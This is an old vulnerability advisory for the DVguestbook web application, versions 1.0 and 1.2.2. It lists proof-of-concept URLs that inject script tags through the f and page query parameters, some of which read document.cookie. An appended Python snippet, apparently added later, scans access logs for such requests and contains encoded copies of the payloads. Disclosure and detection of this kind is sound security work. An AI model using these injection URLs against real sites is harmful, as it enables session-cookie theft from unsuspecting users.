Computer Security
[EN] securityvulns.ru

From: :) :) <liz0_(at)_bsdmail.com>
Date: 10.03.2006
Subject: DVguestbook 1.0 And 1.2.2 Cross Site Scripting

-------------------------------------------------------------------------------------
DVguestbook 1.0 And 1.2.2 Cross Site Scripting

Site:http://suprem.free.fr

Credit : Liz0ziM
webpage:www.biyosecurity.com
Mail   :liz0@bsdmail.com

-------------------------------------------------------------------------------------
DVguestbook 1.0 XSS

http://victim/path/dv_gbook.php?d=0&f='"><script>alert(document.cookie)</script>
http://victim/path/dv_gbook.php?d=0&f='"><script>alert(/BiyoSecurityTeam/)</script>
http://victim/path/dv_gbook.php?d=0&f='"><script>alert(document.domain)</script>

DVguestbook 1.2.2 XSS

http://victim/path/index.php?page="><script>alert(document.cookie)</script>
http://victim/path/index.php?page="><script>alert(/Liz0ziM/)</script>
http://victim/path/index.php?page="><script>alert(document.domain)</script>
-------------------------------------------------------------------------------------
Source:

http://www.blogcu.com/Liz0ziM/326668/
http://biyosecurity.be/bugs/dvguestbook.txt
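
A defender-side check for the two parameters named above, added here as an example (it is not part of the original advisory or of DVguestbook): it scans web-server access-log lines for requests to dv_gbook.php or index.php whose f or page value decodes to HTML metacharacters. The combined log format, the sample lines and the function names are assumptions made for the illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Script name -> reflected query parameter, as listed in the advisory.
WATCHED = {"dv_gbook.php": "f", "index.php": "page"}
# Characters that let a reflected value leave an HTML attribute or open a tag.
MARKUP = re.compile(r"[<>\"']")
# Request line of a combined-format access-log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines; 192.0.2.0/24 is a documentation address range.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Mar/2006:12:00:01 +0000] "GET /path/dv_gbook.php?d=0&f=3 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [10/Mar/2006:12:00:07 +0000] "GET /path/dv_gbook.php?d=0'
    '&f=%27%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 200 5188',
    '192.0.2.44 - - [10/Mar/2006:12:00:09 +0000] "GET /path/index.php'
    '?page=%2522%253E%253Cscript%253Ealert(document.domain)%253C/script%253E HTTP/1.1" 200 4020',
    '192.0.2.10 - - [10/Mar/2006:12:00:12 +0000] "GET /path/index.php?page=2 HTTP/1.1" 200 4001',
]


def suspicious_params(request_target):
    """Return [(param, decoded_value)] for watched parameters carrying markup."""
    parts = urlsplit(request_target)
    script = parts.path.rsplit("/", 1)[-1].lower()
    watched = WATCHED.get(script)
    if watched is None:
        return []
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name != watched:
            continue
        # parse_qsl decodes once; decode again to catch double encoding (%253C).
        decoded = unquote(value)
        if MARKUP.search(decoded):
            hits.append((name, decoded))
    return hits


def scan(log_lines):
    """Yield (line_number, param, value) for each flagged access-log line."""
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if match:
            for name, value in suspicious_params(match.group(1)):
                yield number, name, value
```

Because index.php and page are common names, the check is meant for logs of a host that actually serves DVguestbook; elsewhere it will flag unrelated applications.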
